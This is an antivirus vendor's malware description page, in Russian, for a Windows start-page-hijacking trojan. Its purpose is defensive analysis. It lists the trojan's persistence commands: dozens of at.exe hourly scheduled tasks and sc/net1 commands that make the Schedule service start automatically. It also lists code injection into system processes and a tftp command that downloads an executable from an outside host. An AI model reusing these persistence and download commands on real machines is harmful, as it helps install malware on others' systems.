Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.StartPage.53989
Добавлен в вирусную базу Dr.Web:
2013-06-08
Описание добавлено:
2013-06-11
Техническая информация
Для обеспечения автозапуска и распространения:
Создает или изменяет следующие файлы:
Создает следующие сервисы:
[<HKLM>\SYSTEM\ControlSet001\Services\Schedule] 'Start' = '00000002'
Вредоносные функции:
Создает и запускает на исполнение:
'%WINDIR%\duowan\yy-4.0\duospeak.exe' start schedule
'%WINDIR%\duowan\yy-4.0\duospeak.exe' /c C:\123.bat
'%WINDIR%\duowan\yy-4.0\duospeak.exe' /pid=4860
'%WINDIR%\duowan\yy-4.0\Start.exe' /pid=4884
'%WINDIR%\duowan\yy-4.0\Start.exe' 10:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'%WINDIR%\duowan\yy-4.0\Start.exe'
'%WINDIR%\duowan\yy-4.0\1E33333.exe'
'%WINDIR%\duowan\yy-4.0\Windowsv1.1.exe'
'%WINDIR%\duowan\yy-4.0\duospeak.exe' -l
Запускает на исполнение:
'<SYSTEM32>\at.exe' 1:30 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 2:30 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 23:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 0:30 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\net1.exe' 12:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=5812
'<SYSTEM32>\at.exe' -l
'<SYSTEM32>\at.exe' /pid=5748
'<SYSTEM32>\at.exe' /pid=5772
'<SYSTEM32>\at.exe' 22:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\net1.exe' /pid=3412
'<SYSTEM32>\at.exe' /pid=3440
'<SYSTEM32>\sc.exe' /pid=192
'<SYSTEM32>\net1.exe' 3:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 20:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 21:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\net1.exe' /pid=3240
'<SYSTEM32>\sc.exe'
'<SYSTEM32>\at.exe' /pid=3968
'<SYSTEM32>\at.exe' /pid=5820
'<SYSTEM32>\net1.exe' /pid=4116
'<SYSTEM32>\at.exe' 4:30 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=3568
'<SYSTEM32>\sc.exe' /pid=4404
'<SYSTEM32>\at.exe' /pid=4588
'<SYSTEM32>\at.exe' 5:30 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=4996
'<SYSTEM32>\at.exe' /pid=5012
'<SYSTEM32>\sc.exe' 4:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe'
'<SYSTEM32>\at.exe' /pid=5948
'<SYSTEM32>\net1.exe' /pid=5972
'<SYSTEM32>\at.exe' /pid=5868
'<SYSTEM32>\net1.exe' /pid=5924
'<SYSTEM32>\at.exe' /pid=5996
'<SYSTEM32>\net1.exe' 3:30 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=5732
'<SYSTEM32>\at.exe' /pid=6016
'<SYSTEM32>\sc.exe' /pid=6060
'<SYSTEM32>\at.exe' /pid=3560
'<SYSTEM32>\at.exe' 8:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 9:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 6:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 7:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 10:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 13:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 14:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 11:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 12:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 5:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\net1.exe' start schedule
'<SYSTEM32>\at.exe' 0:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\cmd.exe' /c C:\123.bat
'<SYSTEM32>\sc.exe' config Schedule start= AUTO
'<SYSTEM32>\at.exe' 1:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\tftp.exe' -i 12.xide168.com get 20130529.exe
'<SYSTEM32>\at.exe' 4:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 2:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 3:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=3040
'<SYSTEM32>\at.exe' start schedule
'<SYSTEM32>\at.exe' /pid=272
'<SYSTEM32>\at.exe' 18:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=2868
'<SYSTEM32>\at.exe' /pid=1352
'<SYSTEM32>\at.exe' /pid=1372
'<SYSTEM32>\net1.exe' config Schedule start= AUTO
'<SYSTEM32>\net1.exe' 2:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 19:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=4008
'<SYSTEM32>\at.exe' /pid=3136
'<SYSTEM32>\at.exe' /pid=1496
'<SYSTEM32>\at.exe' /c C:\123.bat
'<SYSTEM32>\at.exe' 15:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\sc.exe' 9:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' 17:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\net1.exe' /pid=3936
'<SYSTEM32>\at.exe' 16:00 /interactive /every:M,T,W,Th,F,S,Su %WINDIR%\duowan\yy-4.0\Start.exe
'<SYSTEM32>\at.exe' /pid=3696
Внедряет код в
следующие системные процессы:
<SYSTEM32>\net1.exe
<SYSTEM32>\sc.exe
<SYSTEM32>\at.exe
<SYSTEM32>\net.exe
Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.
Изменения в файловой системе:
Создает следующие файлы:
%WINDIR%\duowan\yy-4.0\1E33333.exe
%APPDATA%\duowan\yy\C__WINDOWS_duowan_yy-4.0_\LaunchTrace.log
C:\123.bat
%WINDIR%\duowan\yy-4.0\duospeak.exe
%WINDIR%\duowan\yy-4.0\配置.ini
%WINDIR%\duowan\yy-4.0\Windowsv1.1.exe
%WINDIR%\duowan\yy-4.0\Start.exe
%WINDIR%\duowan\yy-4.0\duoakcmd.exe
Удаляет следующие файлы:
%APPDATA%\duowan\yy\C__WINDOWS_duowan_yy-4.0_\LaunchTrace.log
Сетевая активность:
Подключается к:
'localhost':1038
'12.##de168.com':99
'localhost':1035
UDP:
Другое:
Ищет следующие окна:
ClassName: 'MS_WebcheckMonitor' WindowName: ''
ClassName: 'START | A92539D5-6C41-4b8e-BF46-288D19E04799' WindowName: ''
ClassName: 'MS_AutodialMonitor' WindowName: ''
ClassName: 'EDIT' WindowName: ''
ClassName: 'Shell_TrayWnd' WindowName: ''
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK